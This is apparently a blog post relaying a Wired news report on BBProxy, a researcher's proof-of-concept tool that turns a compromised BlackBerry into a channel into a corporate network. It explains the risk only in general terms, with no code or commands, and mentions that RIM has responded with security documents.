One of the things that RIM prides itself on is the tight security offered by the BlackBerry and the BlackBerry Enterprise Server. However, Wired is reporting that maybe our beloved device isn’t as secure as we previously thought. Jesse D’Aguanno, a consultant with Praetorian Global, says he has developed a program called BBProxy which could give hackers direct entry to your company’s network through your BlackBerry.
BBProxy has to be placed on a Blackberry either physically or as a Trojan horse delivered by e-mail. Once installed, it causes the Blackberry to call back to the attacker’s system in the background, opening a communications channel between the attacker and the company’s internal network. From there, safely behind the organization firewall, the intruder can scan for hosts with security vulnerabilities.
D’Aguanno says the technique is successful because most companies aren’t equipped to detect someone trying to deliver an exploit from inside the network, and because few companies view the Blackberry as a plausible attack vector.
“Because it’s a handheld device, most people don’t think it’s something that can actually harm the rest of your internal network,” D’Aguanno said. “But a Blackberry is not your average handheld. It’s not just a PDA that’s connected (to your network) only when you’re in the office. It’s a code-running machine that’s always on and always connected to your internal network and has direct access to whatever you give it access to. And most company architectures allow it unfettered access to everything on the internal network.”
D’Aguanno has been in contact about this with RIM, who’ve released two new security documents on their website this week.